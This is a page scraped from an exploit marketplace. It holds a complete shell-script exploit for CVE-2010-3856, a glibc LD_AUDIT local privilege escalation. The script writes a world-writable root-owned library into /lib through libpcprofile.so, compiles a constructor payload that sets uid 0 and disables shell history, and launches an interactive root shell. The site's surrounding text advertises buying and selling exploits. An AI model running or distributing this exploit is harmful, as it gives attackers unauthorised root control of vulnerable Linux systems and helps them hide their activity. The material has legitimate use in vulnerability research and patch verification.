0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
glibc LD_AUDIT arbitrary DSO load Privilege Escalation
#!/bin/sh ####################################################### # I Can't Read and I Won't Race You Either # # by zx2c4 # ####################################################### ################################################################################ # This is an exploit for CVE-2010-3856. # # A while back, Tavis showed us three ways to exploit flaws in glibc's dynamic # linker involving LD_AUDIT. [1] [2] # # The first way involved opening a file descriptor and using fexecve to easily # win a race with $ORIGIN. The problem was that this required having read # permissions on the SUID executables. Tavis recommended a work around involving # filling a pipe until it was full so that anything written to stderr would # block. This race, however, was not always successful. The third thing he # showed us was that LD_AUDIT would load any trusted library, and he pointed out # that libpcprofile.so could be jiggered to create a world writable root owned # file in any directory. One candidate would be to write something to a crontab. # What if, however, you don't have cron installed? He then went on to explain a # quite extensive search routine to find candidates for libraries to load. # # But why search, when you already can make a world writable root owned file in # any directory you want? The easier way is to use libpcprofile.so to create # such a file, and then fill that file with code you want to run. Then, run that # code using the same trick. Pretty simple, and it works. # # - zx2c4 # 2011-11-9 # # greets to taviso. # # [1] http://seclists.org/fulldisclosure/2010/Oct/257 # [2] http://seclists.org/bugtraq/2010/Oct/200 ################################################################################ echo "[+] Setting umask to 0 so we have world writable files." umask 0 echo "[+] Preparing binary payload." cat > /tmp/payload.c <<_EOF void __attribute__((constructor)) init() { printf("[+] Cleaning up.\n"); unlink("/lib/libexploit.so"); printf("[+] Launching shell.\n"); setuid(0); setgid(0); setenv("HISTFILE", "/dev/null", 1); execl("/bin/sh", "/bin/sh", "-i", 0); } _EOF gcc -w -fPIC -shared -o /tmp/exploit /tmp/payload.c echo "[+] Writing root owned world readable file in /lib" LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/lib/libexploit.so" ping 2>/dev/null echo "[+] Filling the lib file with lib contents." cat /tmp/exploit > /lib/libexploit.so rm /tmp/payload.c /tmp/exploit echo "[+] Executing payload." LD_AUDIT="libexploit.so" ping # 0day.today [2024-07-01] #